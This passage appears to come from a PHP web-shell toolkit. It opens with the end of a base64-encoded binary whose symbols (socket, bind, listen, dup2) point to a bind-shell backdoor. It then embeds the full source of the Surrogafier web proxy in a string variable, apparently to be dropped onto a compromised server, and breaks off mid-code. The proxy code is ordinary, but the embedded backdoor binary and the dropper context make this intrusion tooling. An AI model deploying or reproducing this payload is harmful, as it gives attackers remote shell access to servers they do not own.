QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A"; | |
$phpproxy=" | |
<?php

#
# Surrogafier v1.0-rc3
#
# Author: Brad Cable
# Email: brad@bcable.net
# License: Modified BSD
# License Details:
# http://bcable.net/license.php
#


# CONFIG {{{

# Default to simple mode when the page is loaded. [false]
define('DEFAULT_SIMPLE',false);
# Force the page to always be in simple mode (no advanced mode option). [false]
define('FORCE_SIMPLE',false);
# Width for the URL box when in simple mode (CSS "width" attribute). [300px]
define('SIMPLE_MODE_URLWIDTH','300px');

# Default value for tunnel server. []
define('DEFAULT_TUNNEL_PIP','');
# Default value for tunnel port. []
define('DEFAULT_TUNNEL_PPORT','');
# Should the tunnel fields be displayed? "false" value here will force the defaults above [true]
define('FORCE_DEFAULT_TUNNEL',true);

# Default value for "Persistent URL" checkbox [true]
define('DEFAULT_URL_FORM',true);
# Default value for "Remove Cookies" checkbox [false]
define('DEFAULT_REMOVE_COOKIES',false);
# Default value for "Remove Referer Field" checkbox [false]
define('DEFAULT_REMOVE_REFERER',false);
# Default value for "Remove Scripts" checkbox [false]
define('DEFAULT_REMOVE_SCRIPTS',false);
# Default value for "Remove Objects" checkbox [false]
define('DEFAULT_REMOVE_OBJECTS',false);
# Default value for "Encrypt URLs" checkbox [false]
define('DEFAULT_ENCRYPT_URLS',false);
# Default value for "Encrypt Cookies" checkbox [false]
define('DEFAULT_ENCRYPT_COOKS',false);

/*/ Address Blocking Notes \*\

Formats for address blocking are as follows:

  1.2.3.4     - plain IP address
  1.0.0.0/16  - subnet blocking
  1.0/16      - subnet blocking
  1/8         - subnet blocking
  php.net     - domain blocking

Default Value: '10/8','172/8','192.168/16','127/8','169.254/16'

\*\ End Address Blocking Notes /*/

$blocked_addresses=array('10/8','172/8','192.168/16','127/8','169.254/16');

# }}}

# ADVANCED CONFIG {{{

# The following options alter the way documents are parsed on the page.  ONLY EDIT THIS STUFF IF YOU REALLY KNOW WHAT YOU ARE DOING!

# 500 is the most reasonable number I could come up with as a maximum URL length limit
# I ran into a 1200+ character long URL once and it nearly melted the processor on my laptop trying to parse it
# Honestly, who needs this long of a URL anyway?
define('MAXIMUM_URL_LENGTH',500);

# Time limit in seconds for a single request and parse. [10]
define('TIME_LIMIT',10);
# Time limit in minutes for a DNS entry to be kept in the cache. [10]
define('DNS_CACHE_EXPIRE',10);

# Use gzip (if possible) to compress the connection between the proxy and the user (less bandwidth, more CPU) [false]
define('GZIP_PROXY_USER',false);
# Use gzip (if possible) to compress the connection between the proxy and the server (less bandwidth, more CPU) [false]
define('GZIP_PROXY_SERVER',false);

# Protocol that proxy is running on.  Uncomment this line to define it manually.
# If you leave this line commented, the code detects if you are running on an
# HTTPS connection.  If you are, then 'https' is used as the PROTO value,
# otherwise 'http' is used.  If you need a different value here, then define it.
#define('PROTO','http');

# }}}


// DON'T EDIT ANYTHING AFTER THIS POINT \\


#
# (unless you absolutely know what you are doing...)
#

# COOKIE & SESSION SETUP {{{

//$totstarttime=microtime(true); # BENCHMARK
//$blocked_addresses=array(); # DEBUG

# set error level to not display notices
error_reporting(E_ALL^E_NOTICE);

# set time limit to the defined time limit, if not in safe mode
if(!ini_get('safe_mode')) set_time_limit(TIME_LIMIT);

# use gzip compression if available
if(GZIP_PROXY_USER && extension_loaded('zlib') && !ini_get('zlib.output_compression')) ob_start('ob_gzhandler'); # use gzip encoding to compress all data, if possible

# reverse magic quotes if enabled
if(get_magic_quotes_gpc()){
	function stripslashes_recurse($var){
		if(is_array($var)) $var=array_map('stripslashes_recurse',$var);
		else $var=stripslashes($var);
		return $var;
	}
	$_GET=stripslashes_recurse($_GET);
	$_POST=stripslashes_recurse($_POST);
	$_COOKIE=stripslashes_recurse($_COOKIE);
}

# script environment constants
if(!defined('PROTO')) define('PROTO',($_SERVER['HTTPS']=='on'?'https':'http'));
define('VERSION','1.0-rc3');
define('THIS_SCRIPT',PROTO."://{$_SERVER['HTTP_HOST']}{$_SERVER['PHP_SELF']}");
define('SIMPLE_MODE',DEFAULT_SIMPLE || FORCE_SIMPLE);

# Randomized cookie prefixes #
function gen_randstr($len){
	$chars=null;
	for($i=0;$i<$len;$i++){
		$char=rand(0,25);
		$char=chr($char+97);
		$chars.=$char;
	}
	return $chars;
}

function dosetcookie($cookname,$cookval,$expire=null){
	$_COOKIE[$cookname]=$cookval;
	if($expire===null) setcookie($cookname,$cookval);
	else setcookie($cookname,$cookval,$expire);
}

define('FIRST_LOAD',empty($_COOKIE['PHPSESSID']));
session_start();
if(empty($_SESSION['sesspref'])){
	$sesspref=gen_randstr(30);
	$_SESSION['sesspref']=$sesspref;
}
else $sesspref=$_SESSION['sesspref'];

if(empty($_COOKIE['user'])){
	$cookpref=gen_randstr(12);
	dosetcookie('user',$cookpref);
}
else $cookpref=$_COOKIE['user'];

define('SESS_PREF',$sesspref);
define('COOK_PREF',$cookpref);
define('COOKIE_SEPARATOR','__'.COOK_PREF.'__');
unset($sesspref,$cookpref);

if(FIRST_LOAD){
	if(DEFAULT_URL_FORM) dosetcookie(COOK_PREF.'_url_form',true);
	if(DEFAULT_REMOVE_COOKIES) dosetcookie(COOK_PREF.'_remove_cookies',true);
	if(DEFAULT_REMOVE_REFERER) dosetcookie(COOK_PREF.'_remove_referer',true);
	if(DEFAULT_REMOVE_SCRIPTS) dosetcookie(COOK_PREF.'_remove_scripts',true);
	if(DEFAULT_REMOVE_OBJECTS) dosetcookie(COOK_PREF.'_remove_objects',true);
	if(DEFAULT_ENCRYPT_URLS) dosetcookie(COOK_PREF.'_encrypt_urls',true);
	if(DEFAULT_ENCRYPT_COOKS) dosetcookie(COOK_PREF.'_encrypt_cooks',true);
}

# }}}

# ENVIRONMENT SETUP {{{

global $postandget,$blocked_addresses,$dns_cache_array;
$postandget=array_merge($_GET,$_POST);

define('PAGETYPE_MINIREGEXP','(=[_\.\-]?\&=|=)?');
define('PAGETYPE_REGEXP','/^'.PAGETYPE_MINIREGEXP.'(.*)$/');
if(!empty($postandget[COOK_PREF])) $oenc_url=$postandget[COOK_PREF];
else{
	$pagetype_str=preg_replace(PAGETYPE_REGEXP,'\1',$_SERVER['QUERY_STRING']);
	define('QUERY_STRING',substr($_SERVER['QUERY_STRING'],strlen($pagetype_str),strlen($_SERVER['QUERY_STRING'])-strlen($pagetype_str)));
	define('PAGETYPE_NULL',0);
	define('PAGETYPE_FORCE_MAIN',1);
	define('PAGETYPE_FRAME_TOP',2);
	define('PAGETYPE_FRAMED_PAGE',3);
	define('PAGETYPE_FRAMED_CHILD',4); # framing children for crimes isn't very nice, but the script does it anyway
	switch($pagetype_str){
		case '=&=': define('PAGETYPE_ID',PAGETYPE_FRAME_TOP); break;
		case '=_&=': define('PAGETYPE_ID',PAGETYPE_FRAMED_PAGE); break;
		case '=-&=': define('PAGETYPE_ID',PAGETYPE_FORCE_MAIN); break;
		case '=.&=': define('PAGETYPE_ID',PAGETYPE_FRAMED_CHILD); break;
# this is one more unencoded string for future features
#		case '=*&=': define('PAGETYPE_ID',); break;
		default: define('PAGETYPE_ID',PAGETYPE_NULL); break;
	}
	unset($pagetype_str);

	define('NEW_PAGETYPE_FRAME_TOP',(PAGETYPE_ID===PAGETYPE_FRAMED_CHILD?PAGETYPE_FRAMED_CHILD:PAGETYPE_FRAME_TOP));
	define('NEW_PAGETYPE_FRAMED_PAGE',(PAGETYPE_ID===PAGETYPE_FRAMED_CHILD?PAGETYPE_FRAMED_CHILD:PAGETYPE_FRAMED_PAGE));

	$oenc_url=QUERY_STRING;
	//define('OENC_URL',urldecode(preg_replace('/^([^&]*).*?$/i','\1',QUERY_STRING)));
}
if(strpos(substr($oenc_url,0,6),'%')!==false || strpos($oenc_url,'%')<strpos($oenc_url,'/') || strpos($oenc_url,'%')<strpos($oenc_url,':')) $oenc_url=urldecode($oenc_url);
define('OENC_URL',preg_replace('/^([^\?\&]+)\&/i','\1?',$oenc_url));
unset($oenc_url);
define('ORIG_URL',proxdec(OENC_URL));
global $curr_url;
$curr_url=ORIG_URL;

function gethardattr($attr){
	global $postandget;
	return (empty($postandget[COOK_PREF.'_set_values'])?!empty($_COOKIE[COOK_PREF."_{$attr}"]):!empty($postandget[COOK_PREF."_{$attr}"]));
}
define('ENCRYPT_URLS',gethardattr('encrypt_urls'));
define('URL_FORM',gethardattr('url_form'));
define('PAGE_FRAMED',(PAGETYPE_ID===PAGETYPE_FRAMED_PAGE || PAGETYPE_ID===PAGETYPE_FRAMED_CHILD || QUERY_STRING=='js_regexps_framed' || QUERY_STRING=='js_funcs_framed'));
#define('URLVAR',(ENCRYPT_URLS?'e':null).'url');

# }}}

# PHP DECODING FUNCTIONS {{{

function my_base64_decode($string){ return base64_decode(str_replace(' ','+',urldecode($string))); }

function proxdec($url){
	if($url{0}!='~' && strtolower(substr($url,0,3))!='%7e') return $url;
	#while(strpos($url,'%')!==false) $url=urldecode($url);
	#$url=urldecode($url);
	while($url{0}=='~' || strtolower(substr($url,0,3))=='%7e'){
		$url=substr($url,1);
		$url=my_base64_decode($url);
		$new_url=null;
		for($i=0;$i<strlen($url);$i++){
			$char=ord($url{$i});
			$char-=ord(substr(SESS_PREF,$i%strlen(SESS_PREF),1));
			while($char<32) $char+=94;
			$new_url.=chr($char);
		}
		$url=$new_url;
	}
	return urldecode($url);
}

# }}}

# JAVASCRIPT ENCODING FUNCTIONS {{{

function js_proxenc(){ ?>
//<script>
<?php echo(COOK_PREF); ?>_pe={
expon:function(a,b){
	var num;
	if(b==0) return 1;
	num=a; b--;
	while(b>0){ num*=a; b--; }
	return num;
},

dectobin:function(){
	var dec=arguments[0],chars=arguments[1]||8,binrep="";
	for(j=chars-1;j>=0;j--){
		if(dec>=this.expon(2,j)){
			binrep+="1"; dec-=this.expon(2,j);
		}
		else binrep+="0";
	}
	return binrep;
},

bintodec:function(){
	var bin=arguments[0],chars=arguments[1]||8,dec=0;
	for(var j=0;j<chars;j++) if(bin.substring(j,j+1)=="1") dec+=this.expon(2,chars-1-j);
	return dec;
},

b64e:function(string){
	var encstr="",binrep="";
	var charbin,charnum;
	for(var i=0;i<string.length;i++){
		charnum=string.charCodeAt(i);
		binrep+=this.dectobin(charnum);
	}
	while(binrep.length%6) binrep+="00";
	for(var i=1;i*6<=binrep.length;i++){
		charbin=binrep.substring((i-1)*6,i*6);
		charnum=this.bintodec(charbin,6);
		if(charnum<=25) charnum+=65;
		else if(charnum<=51) charnum+=71;
		else if(charnum<=61) charnum-=4;
		else if(charnum==62) charnum=43;
		else if(charnum==63) charnum=47;
		encstr+=String.fromCharCode(charnum);
	}
	while(encstr.length%8) encstr+="=";
	return encstr;
},

proxenc:function(url){
	var new_url="";
	var charnum;
	if(url.substring(0,1)=="~" || url.substring(0,3).toLowerCase()=="%7e") return url;
	url=encodeURIComponent(url);
	var sess_pref="<?php echo(SESS_PREF); ?>";
	for(i=0;i<url.length;i++){
		charnum=url.charCodeAt(i);
		charnum+=sess_pref.charCodeAt(i%sess_pref.length);
		while(charnum>126) charnum-=94;
		new_url+=String.fromCharCode(charnum);
	}
	return "~"+encodeURIComponent(this.b64e(new_url));
}
}
<? }

# }}}

# FIRST PAGE DISPLAYED WHEN ACCESSING PROXY {{{

if(PAGETYPE_ID===PAGETYPE_FORCE_MAIN || (substr(QUERY_STRING,0,3)!='js_' && ORIG_URL==null)){

$useragentinfo=null;
if(stristr($_SERVER['HTTP_USER_AGENT'],'windows')!==false || stristr($_SERVER['HTTP_USER_AGENT'],'win32')!==false) $useragentinfo.='Windows';
elseif(stristr($_SERVER['HTTP_USER_AGENT'],'macintosh')!==false || stristr($_SERVER['HTTP_USER_AGENT'],'mac_powerpc')!==false) $useragentinfo.='Macintosh';
elseif(stristr($_SERVER['HTTP_USER_AGENT'],'linux')!==false) $useragentinfo.='Linux';
elseif(stristr($_SERVER['HTTP_USER_AGENT'],'bsd')!==false) $useragentinfo.='BSD';
else $useragentinfo.='Unknown';

$useragentinfo.=' / ';

if(stristr($_SERVER['HTTP_USER_AGENT'],'msie')!==false) $useragentinfo.='Internet Explorer';
elseif(stristr($_SERVER['HTTP_USER_AGENT'],'firefox')!==false) $useragentinfo.='Firefox';
elseif(stristr($_SERVER['HTTP_USER_AGENT'],'netscape')!==false) $useragentinfo.='Netscape';
elseif(stristr($_SERVER['HTTP_USER_AGENT'],'opera')!==false) $useragentinfo.='Opera';
elseif(stristr($_SERVER['HTTP_USER_AGENT'],'konqueror')!==false) $useragentinfo.='Konqueror';
elseif(stristr($_SERVER['HTTP_USER_AGENT'],'seamonkey')!==false) $useragentinfo.='SeaMonkey';
else $useragentinfo.='Unknown';

$useragent_array=array(
	array(null,"Actual ({$useragentinfo})"),
	array('-1',' [ Don\'t Send ] '),
	array('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0','Windows XP / Firefox 2.0'),
	array('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)','Windows XP / Internet Explorer 7'),
	array('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','Windows XP / Internet Explorer 6'),
	array('Opera/9.02 (Windows NT 5.1; U; en)','Windows XP / Opera 9.02'),
	array('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0','Mac OS X / Firefox 2.0'),
	array('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24','Mac OS X / Safari 3.0'),
	array('Opera/9.02 (Macintosh; PPC Mac OS X; U; en)','Mac OS X / Opera 9.02'),
	array('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0','Linux / Firefox 2.0'),
	array('Opera/9.02 (X11; Linux i686; U; en)','Linux / Opera 9.02'),
	array('Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko)','Linux / Konqueror 3.5.5'),
	array('Links (2.1pre19; Linux 2.6 i686; x)','Linux / Links (2.1pre19)'),
	array('Lynx/2.8.5rel.1','Any / Lynx 2.8.5rel.1'),
	array('Dillo/0.8.6','Any / Dillo 0.8.6'),
	array('Wget/1.10.2','Any / Wget 1.10.2'),
	array('1',' [ Custom ] <noscript><b>**</b></noscript>')
);

define('IPREGEXP','/^((?:[0-2]{0,2}[0-9]{1,2}\.){3}[0-2]{0,2}[0-9]{1,2})\:([0-9]{1,5})$/');

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" 
 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>
<title>Surrogafier</title>
<meta name="robots" content="index, nofollow" />
<style>
	body{font-family: bitstream vera sans, trebuchet ms}
	input{border: 1px solid #000000}
	select{border: 1px solid #000000}
	a{color: #000000}
	a:hover{text-decoration: none}
	.advanced_stuff{display: <?php echo(SIMPLE_MODE?'none':'table-row'); ?>}
	.simple_stuff{display: <?php echo(SIMPLE_MODE?'table-row':'none'); ?>}
	.url{width: <?php echo(SIMPLE_MODE?SIMPLE_MODE_URLWIDTH:'99%'); ?>}
	.signature{float: left}
<?php if(FORCE_SIMPLE){ ?>
	.noscript_stuff{display: none}
	.signature{text-align: center; float: none}
<?php } ?>
</style>
<?php if(!FORCE_SIMPLE){ ?><noscript><style>
	.advanced_stuff{display: table-row}
	.simple_stuff{display: none}
	.noscript_stuff{display: none}
	.noscripturl{width: 99%}
	.url{display: none}
	.signature{text-align: center; float: none}
</style></noscript><?php } ?>
<script language="javascript">
<!--

<?php js_proxenc(); ?>

function useragent_check(focus){
	if(document.getElementsByName('<?php echo(COOK_PREF); ?>_useragent')[0].value=='1'){
		document.getElementById('useragent_texttr').style.display="";
		if(focus) document.getElementById('<?php echo(COOK_PREF); ?>_useragenttext').focus();
	}
	else document.getElementById('useragent_texttr').style.display='none';
}

<?php if(!FORCE_SIMPLE){ ?>
advanced_mode=true;
function toggle_mode(){
	document.getElementById("mode_toggler").innerHTML=(advanced_mode?"Advanced Mode":"Simple Mode");
	var advanced_stuff=document.getElementsByTagName("tr");
	for(var i=1;i<=12;i++) advanced_stuff[i].style.display=(advanced_mode?"none":"");
	document.getElementById("simple_submit").style.display=(advanced_mode?"inline":"none");
	document.getElementById("url").style.width=(advanced_mode?"<?php echo(SIMPLE_MODE_URLWIDTH); ?>":"99%");
	advanced_mode=!advanced_mode;
	if(advanced_mode) useragent_check(false);
	setTimeout("document.getElementById('url').focus();",100);
}
<?php } ?>

function submit_code(){
	document.forms[0].<?php echo(COOK_PREF); ?>.disabled=false;
	if(document.forms[0].<?php echo(COOK_PREF); ?>_encrypt_urls.checked)
		document.forms[0].<?php echo(COOK_PREF); ?>.value=<?php echo(COOK_PREF); ?>_pe.proxenc(document.getElementById('url').value);
	else
		document.forms[0].<?php echo(COOK_PREF); ?>.value=document.getElementById('url').value;
	return true;
}

//-->
</script>
</head>
<body<?php echo(SIMPLE_MODE?' onload="toggle_mode();"':null); ?>>
<center>
<span style="font-size: 18pt; font-weight: bold; margin-bottom: 5px">Surrogafier</span>
<form method="post" onsubmit="return submit_code();" style="margin: 0px; padding: 0px">
<input type="hidden" name="<?php echo(COOK_PREF); ?>_set_values" value="1" />
<input type="hidden" name="<?php echo(COOK_PREF); ?>" disabled="disabled" />
<table>
<tr>
<td style="text-align: left">URL:&nbsp;&nbsp;</td>
<td>
	<input type="text" class="url" id="url" value="<?php echo(ORIG_URL); ?>" />
	<noscript><input type="text" class="noscripturl" name="<?php echo(COOK_PREF); ?>" id="url" value="<?php echo(ORIG_URL); ?>" /></noscript>
	<input type="submit" class="simple_stuff" id="simple_submit" value="Surrogafy" style="background-color: #F0F0F0" />
</td>
</tr>
<tr class="advanced_stuff"<?php if(FORCE_DEFAULT_TUNNEL){ ?> style="display: none"><?php } ?>
<td style="text-align: left">Tunnel Proxy:</td>
<td><table cellspacing="0" cellpadding="0">
<tr>
	<td style="width: 100%"><input type="text" name="<?php echo(COOK_PREF); ?>_pip" onkeyup="if(this.value.match(<?php echo(IPREGEXP); ?>)){ document.forms[0].<?php echo(COOK_PREF); ?>_pport.value=this.value.replace(<?php echo(IPREGEXP); ?>,'\$2'); this.value=this.value.replace(<?php echo(IPREGEXP); ?>,'\$1'); document.forms[0].<?php echo(COOK_PREF); ?>_pport.focus(); };" style="width: 100%; text-align: left" value="<?php echo(empty($_COOKIE[COOK_PREF.'_pip'])?DEFAULT_TUNNEL_PIP:$_COOKIE[COOK_PREF.'_pip']); ?>" /></td>
	<td style="width: 5px">&nbsp;&nbsp;</td>
	<td style="width: 50px"><input type="text" name="<?php echo(COOK_PREF); ?>_pport" maxlength="5" size="5" style="width: 50px" value="<?php echo(empty($_COOKIE[COOK_PREF.'_pport'])?DEFAULT_TUNNEL_PPORT:$_COOKIE[COOK_PREF.'_pport']); ?>" /></td>
</tr>
</table></td>
</tr>
<tr class="advanced_stuff">
<td style="text-align: left">User-Agent:</td>
<td><select name="<?php echo(COOK_PREF); ?>_useragent" style="width: 100%" onchange="useragent_check(true);">
<?php foreach($useragent_array as $useragent){ ?>
	<option value="<?php echo($useragent[0]); ?>"<?php if($_COOKIE[COOK_PREF.'_useragent']==$useragent[0]) echo ' selected="selected"'; ?>><?php echo($useragent[1]); ?></option>
<?php } ?>
</select></td>
</tr>
<tr class="advanced_stuff" id="useragent_texttr"<?php echo($_COOKIE[COOK_PREF.'_useragent']=='1'?null:' style="display: none"'); ?>>
	<td>&nbsp;</td>
	<td><input type="text" id="<?php echo(COOK_PREF); ?>_useragenttext" name="<?php echo(COOK_PREF); ?>_useragenttext" value="<?php echo($_COOKIE[COOK_PREF.'_useragenttext']); ?>" style="width: 99%" /></td>
</tr>
<tr class="advanced_stuff"><td>&nbsp;</td><td style="text-align: left"><input type="checkbox" name="<?php echo(COOK_PREF); ?>_url_form" style="border: 0px" <?php if(!empty($_COOKIE[COOK_PREF.'_url_form'])) echo 'checked="checked" '; ?>/>&nbsp;Persistent URL Form</td></tr>
<tr class="advanced_stuff"><td>&nbsp;</td><td style="text-align: left"><input type="checkbox" name="<?php echo(COOK_PREF); ?>_remove_cookies" style="border: 0px" <?php if(!empty($_COOKIE[COOK_PREF.'_remove_cookies'])) echo 'checked="checked" '; ?>/>&nbsp;Remove Cookies</td></tr>
<tr class="advanced_stuff"><td>&nbsp;</td><td style="text-align: left"><input type="checkbox" name="<?php echo(COOK_PREF); ?>_remove_referer" style="border: 0px" <?php if(!empty($_COOKIE[COOK_PREF.'_remove_referer'])) echo 'checked="checked" '; ?>/>&nbsp;Remove Referer Field</td></tr>
<tr class="advanced_stuff"><td>&nbsp;</td><td style="text-align: left"><input type="checkbox" name="<?php echo(COOK_PREF); ?>_remove_scripts" style="border: 0px" <?php if(!empty($_COOKIE[COOK_PREF.'_remove_scripts'])) echo 'checked="checked" '; ?>/>&nbsp;Remove Scripts (JS, VBS, etc)</td></tr>
<tr class="advanced_stuff"><td>&nbsp;</td><td style="text-align: left"><input type="checkbox" name="<?php echo(COOK_PREF); ?>_remove_objects" style="border: 0px" <?php if(!empty($_COOKIE[COOK_PREF.'_remove_objects'])) echo 'checked="checked" '; ?>/>&nbsp;Remove Objects (Flash, Java, etc)</td></tr>
<tr class="advanced_stuff"><td>&nbsp;</td><td style="text-align: left"><input type="checkbox" name="<?php echo(COOK_PREF); ?>_encrypt_urls" style="border: 0px" <?php if(!empty($_COOKIE[COOK_PREF.'_encrypt_urls'])) echo 'checked="checked" '; ?>/>&nbsp;Encrypt URLs<noscript><b>**</b></noscript></td></tr>
<tr class="advanced_stuff"><td>&nbsp;</td><td style="text-align: left"><input type="checkbox" name="<?php echo(COOK_PREF); ?>_encrypt_cooks" style="border: 0px" <?php if(!empty($_COOKIE[COOK_PREF.'_encrypt_cooks'])) echo 'checked="checked" '; ?>/>&nbsp;Encrypt Cookies<noscript><b>**</b></noscript></td></tr>
<tr class="advanced_stuff"><td colspan="2"><input type="submit" value="Surrogafy" style="width: 100%; background-color: #F0F0F0" /></td></tr>
<tr><td style="font-size: 8pt" colspan="2">
<div class="signature">Surrogafier v<?php echo(VERSION); ?> <b>&middot;</b> Brad Cable</div>
<div class="noscript_stuff" style="float: right"><a href="#" onclick="toggle_mode();" id="mode_toggler"><?php echo(SIMPLE_MODE?'Advanced':'Simple'); ?> Mode</a></div>
</td></tr>
</table>
<noscript>
<br />
<b>**</b> Surrogafier has detected that your browser does not have Javascript enabled. <b>**</b>
<br />
<b>**</b> Surrogafier requires Javascript in order to function to its full potential. <b>**</b>
</noscript>
</form>
</center>
</body>
</html>

<?php exit(); }

# }}}

# FRAMED PAGE WITH URL FORM {{{
if(PAGETYPE_ID===PAGETYPE_FRAME_TOP && ORIG_URL!=null){ ?>
<html>
<head>
<title><?php echo(ORIG_URL); ?></title>
<style>
	body{font-family: bitstream vera sans, trebuchet ms; margin: 0px; padding: 0px; font-size: 12px; overflow: hidden}
	input{border: 1px solid #000000}
	td{font-size: 12px}
	a{text-decoration: none; color: #000000}
	a:hover{text-decoration: underline}
</style>
<script>
<!--

<?php echo(COOK_PREF); ?>=true;

<?php if(ENCRYPT_URLS) js_proxenc(); ?>

function submit_code(){
<?php if(ENCRYPT_URLS){ ?>
	document.forms[0].<?php echo(COOK_PREF); ?>.value=<?php echo(COOK_PREF); ?>_pe.proxenc(document.forms[0].<?php echo(COOK_PREF); ?>.value);
<?php } ?>
	return true;
}

//-->
</script>
</head>
<body>
<form method="get" onsubmit="return submit_code();">
<input type="hidden" name="" value="" />
<table cellpadding="0" cellspacing="0" style="width: 100%; height: 100%; padding: 0px; margin: 0px">
<tr><td><table cellpadding="0" cellspacing="0" style="width: 100%; padding: 3px">
<tr>
	<td>&nbsp;<b><a id="proxy_link" href="<?php echo(THIS_SCRIPT.'?=-&='.OENC_URL); ?>">Surrogafier</a></b>&nbsp;&nbsp;</td>
	<td style="width: 100%"><input type="text" class="url" name="" style="width: 100%; padding-left: 4px" id="url" value="<?php echo(ORIG_URL); ?>" /></td>
	<td>&nbsp;</td>
	<td><input type="submit" class="simple_stuff" id="simple_submit" value="Surrogafy" style="background-color: #F0F0F0" /></td>
</tr>
</table></td></tr>
<tr><td style="height: 100%; border-top: 1px solid #000000">
<iframe name="<?php echo(COOK_PREF); ?>_top" src="<?php echo(THIS_SCRIPT.'?=_&='.OENC_URL); ?>" frameborder="0" style="border: 0px; width: 100%; height: 100%"></iframe>
</td></tr>
</table>
</form>
</body>
</html>
<?php exit(); }

# }}}

# PRE-JAVASCRIPT CONSTANTS & FUNCTIONS {{{
# these constants and functions must be defined before JS is output, but would be more readably located later

#define('AURL_LOCK_REGEXP','(?:(?:javascript|mailto|about):|~|%7e)');
define('FRAME_LOCK_REGEXP','/^(?:(?:javascript|mailto|about):|#)/i');
define('AURL_LOCK_REGEXP','/^(?:(?:javascript|mailto|about):|#|'.str_replace(array('/','.'),array('\/','\.'),addslashes(THIS_SCRIPT)).')/i');
define('URLREG','/^'.
	'(?:([a-z]*)?(?:\:?\/\/))'.		# proto
	'(?:([^\@\/]*)\@)?'.			# userpass
	'([^\/:\?\#\&]*)'.			# servername
	'(?:\:([0-9]+))?'.			# portval
	'(\/[^\&\?\#]*?)?'.			# path
	'([^\/\?\#\&]*(?:\&[^\?\#]*)?)'.	# file
	'(?:\?([\s\S]*?))?'.			# query
	'(?:\#([\s\S]*))?'.			# label
'$/ix');

function escape_regexp($regexp,$dollar=false){
	$regexp=str_replace('\\','\\\\',str_replace('\'','\\\'',str_replace('"','\\"',str_replace(chr(10),'\n',str_replace(chr(13),'\r',str_replace(chr(9),'\t',$regexp))))));
	return ($dollar?preg_replace('/[\\\\]+(?=[0-9])/','\\\\$',$regexp):preg_replace('/[\\\\]+(?=[0-9])/','\\\\\\\\',$regexp)); #*
}

# }}}

# JAVASCRIPT FUNCS {{{

if(QUERY_STRING=='js_funcs' || QUERY_STRING=='js_funcs_framed'){ ?>//<script>

// JAVASCRIPT FUNCS: DECODING {{{
<?php js_proxenc(); ?>

<?php echo(COOK_PREF); ?>_pe.b64d=function(string){
	var binrep="",decstr="";
	var charnum,charbin;
	string=string.replace(/[=]*$/,"");
	for(var i=0;i<string.length;i++){
		charnum=string.charCodeAt(i);
		if(charnum>=97) charnum-=71;
		else if(charnum>=65) charnum-=65;
		else if(charnum>=48) charnum+=4;
		else if(charnum==43) charnum=62;
		else if(charnum==47) charnum=63;
		binrep+=this.dectobin(charnum,6);
	}
	for(var i=0;i+8<binrep.length;i+=8){
		charbin=binrep.substr(i,8);
		decstr+=String.fromCharCode(this.bintodec(charbin));
	}
	return decstr;
}

<?php echo(COOK_PREF); ?>_pe.proxdec=function(url){
	var new_url,charnum;
	if(url.substr(0,1)!='~' && url.substr(0,3).toLowerCase()!='%7e') return url;
	while(url.substr(0,1)=='~' || url.substr(0,3).toLowerCase()=='%7e'){
		url=url.substr(1,url.length-1);
		url=this.b64d(url);
		new_url="";
		for(i=0;i<url.length;i++){
			charnum=url.charCodeAt(i);
			charnum-="<?php echo(SESS_PREF); ?>".charCodeAt(i%"<?php echo(SESS_PREF); ?>".length);
			while(charnum<32) charnum+=94;
			new_url+=String.fromCharCode(charnum);
		}
		url=new_url;
	}
	return decodeURIComponent(url); // urldecode()
}

// }}}

// JAVASCRIPT FUNCS: COOK_PREF OBJECT {{{

<?php echo(COOK_PREF); ?>={

URLREG:<?php echo(substr(URLREG,0,strlen(URLREG)-1)); ?>,
THIS_SCRIPT:"<?php echo(THIS_SCRIPT); ?>",
COOK_PREF:"<?php echo(COOK_PREF); ?>",
pe:<?php echo(COOK_PREF); ?>_pe,
gen_curr_urlobj:function(){ this.curr_urlobj=new this.aurl(this.CURR_URL); },

getCookieArr:function(){ return document.cookie.split("; "); },

aurl:function(url,topurl){
	this.URLREG=<?php echo(COOK_PREF); ?>.URLREG;
	this.THIS_SCRIPT=<?php echo(COOK_PREF); ?>.THIS_SCRIPT;
	this.ENCRYPT_URLS=<?php echo(COOK_PREF); ?>.ENCRYPT_URLS;

	this.trim=function(str){ return str.replace(/^\s*([\s\S]*?)\s*$/,"$1"); }

	this.get_fieldreq=function(fieldno,value){
		var fieldreqs=new Array();
		fieldreqs[2]="://"+(value!=""?value+"@":"");
		fieldreqs[4]=(value!="" && parseInt(value)!=80?":"+parseInt(value):"");
		fieldreqs[7]=(value!=""?"?"+value:"");
		fieldreqs[8]=(value!=""?"#"+value:"");
		if(fieldreqs[fieldno]!=undefined) return value;
		// return (value!=""?null:value);
		else return fieldreqs[fieldno];
	}

	this.set_proto=function(proto){
		if(proto==undefined) proto="http";
		if(this.locked) return;
		this.proto=proto;
	}
	this.get_proto=function(){ return this.proto; }

	this.get_userpass=function(){ return this.userpass; }
	this.set_userpass=function(userpass){ if(userpass==undefined) userpass=""; this.userpass=userpass; }
	this.get_servername=function(){ return this.servername; }
